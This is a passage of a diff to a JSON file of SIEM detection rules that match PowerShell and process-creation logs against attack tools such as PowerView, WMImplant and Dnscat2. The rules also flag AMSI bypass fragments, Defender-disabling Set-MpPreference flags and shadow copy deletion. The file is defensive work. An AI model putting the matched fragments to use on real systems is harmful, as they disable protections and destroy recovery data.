'%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.exfiltration", - "attack.t1048", "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Administrative scripts that use the same keywords." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" - ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" - }, - { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ], - "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "status": "test", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE 